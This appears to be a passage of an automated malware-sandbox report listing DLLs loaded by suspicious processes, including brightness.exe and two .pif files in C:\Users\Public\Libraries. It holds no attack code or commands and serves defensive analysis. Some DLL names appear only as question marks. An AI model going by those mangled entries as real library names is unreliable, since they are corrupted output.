Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ???.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ???.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ???.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ??l.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ??l.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ?.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ?.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ??l.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ????.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ???e???????????.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ???e???????????.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ?.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ?.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ?.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ?.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ??l.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ??l.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: tquery.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: cryptdll.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: spp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: spp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: endpointdlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: endpointdlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: endpointdlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: endpointdlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: advapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: advapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: advapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: advapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: advapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: advapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: advapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: spp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: sppwmi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: sppcext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: winscard.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Section loaded: version.dll	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: apphelp.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: version.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: uxtheme.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: url.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: ieframe.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: iertutil.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: netapi32.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: userenv.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: winhttp.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: wkscli.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: netutils.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: windows.storage.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: wldp.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: kernel.appcore.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: propsys.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: amsi.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: smartscreenps.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: winmm.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: wininet.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: sspicli.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: profapi.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: mswsock.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: ieproxy.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: ieproxy.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: ieproxy.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: msasn1.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: iphlpapi.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: msasn1.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: winnsi.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: msasn1.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: mssip32.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: msasn1.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: mssip32.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: msasn1.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: mssip32.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: msasn1.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: sppc.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: ???.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: ???.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: ???.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: ??l.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: ??l.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: ?.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: ?.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: ??l.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: ????.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: ???e???????????.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: ???e???????????.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: ?.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: ?.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: ?.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: ?.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: ??l.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: ??l.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: sppc.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: sppc.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: sppc.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: sppc.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: tquery.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: cryptdll.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: spp.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: vssapi.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: vsstrace.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: spp.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: vssapi.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: vsstrace.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: mssip32.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: msasn1.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: endpointdlp.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: endpointdlp.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: endpointdlp.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: endpointdlp.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: advapi.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: advapi.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: advapi.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: advapi.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: advapi.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: advapi.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: advapi.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: spp.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: vssapi.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: vsstrace.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: sppwmi.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: slc.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: sppc.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: sppcext.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: sppc.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: winscard.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: devobj.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: cryptsp.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: rsaenh.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: cryptbase.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: msasn1.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: sppc.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: sppc.dll
Source: C:\Users\Public\Libraries\npratlsN.pif	Section loaded: kernel.appcore.dll
Source: C:\Users\Public\Libraries\npratlsN.pif	Section loaded: uxtheme.dll
Source: C:\Users\Public\Libraries\npratlsN.pif	Section loaded: mscoree.dll
Source: C:\Users\Public\Libraries\npratlsN.pif	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\Public\Libraries\npratlsN.pif	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\Public\Libraries\npratlsN.pif	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\Public\Libraries\npratlsN.pif	Section loaded: wldp.dll
Source: C:\Users\Public\Libraries\npratlsN.pif	Section loaded: amsi.dll
Source: C:\Users\Public\Libraries\npratlsN.pif	Section loaded: userenv.dll
Source: C:\Users\Public\Libraries\npratlsN.pif	Section loaded: profapi.dll
Source: C:\Users\Public\Libraries\npratlsN.pif	Section loaded: version.dll
Source: C:\Users\Public\Libraries\npratlsN.pif	Section loaded: msasn1.dll
Source: C:\Users\Public\Libraries\npratlsN.pif	Section loaded: gpapi.dll
Source: C:\Users\Public\Libraries\npratlsN.pif	Section loaded: cryptsp.dll
Source: C:\Users\Public\Libraries\npratlsN.pif	Section loaded: rsaenh.dll
Source: C:\Users\Public\Libraries\npratlsN.pif	Section loaded: cryptbase.dll
Source: C:\Users\Public\Libraries\npratlsN.pif	Section loaded: windows.storage.dll
Source: C:\Users\Public\Libraries\npratlsN.pif	Section loaded: rasapi32.dll
Source: C:\Users\Public\Libraries\npratlsN.pif	Section loaded: rasman.dll
Source: C:\Users\Public\Libraries\npratlsN.pif	Section loaded: rtutils.dll
Source: C:\Users\Public\Libraries\npratlsN.pif	Section loaded: mswsock.dll
Source: C:\Users\Public\Libraries\npratlsN.pif	Section loaded: winhttp.dll
Source: C:\Users\Public\Libraries\npratlsN.pif	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\Public\Libraries\npratlsN.pif	Section loaded: iphlpapi.dll
Source: C:\Users\Public\Libraries\npratlsN.pif	Section loaded: dhcpcsvc6.dll
Source: C:\Users\Public\Libraries\npratlsN.pif	Section loaded: dhcpcsvc.dll
Source: C:\Users\Public\Libraries\npratlsN.pif	Section loaded: dnsapi.dll
Source: C:\Users\Public\Libraries\npratlsN.pif	Section loaded: winnsi.dll
Source: C:\Users\Public\Libraries\npratlsN.pif	Section loaded: rasadhlp.dll
Source: C:\Users\Public\Libraries\npratlsN.pif	Section loaded: fwpuclnt.dll
Source: C:\Users\Public\Libraries\npratlsN.pif	Section loaded: secur32.dll
Source: C:\Users\Public\Libraries\npratlsN.pif	Section loaded: sspicli.dll
Source: C:\Users\Public\Libraries\npratlsN.pif	Section loaded: schannel.dll
Source: C:\Users\Public\Libraries\npratlsN.pif	Section loaded: mskeyprotect.dll
Source: C:\Users\Public\Libraries\npratlsN.pif	Section loaded: ntasn1.dll
Source: C:\Users\Public\Libraries\npratlsN.pif	Section loaded: ncrypt.dll
Source: C:\Users\Public\Libraries\npratlsN.pif	Section loaded: ncryptsslp.dll
Source: C:\Users\Public\Libraries\npratlsN.pif	Section loaded: dpapi.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: version.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: uxtheme.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: url.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: ieframe.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: iertutil.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: netapi32.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: userenv.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: winhttp.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: wkscli.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: netutils.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: windows.storage.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: wldp.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: kernel.appcore.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: propsys.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: amsi.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: smartscreenps.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: winmm.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: wininet.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: sspicli.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: profapi.dll
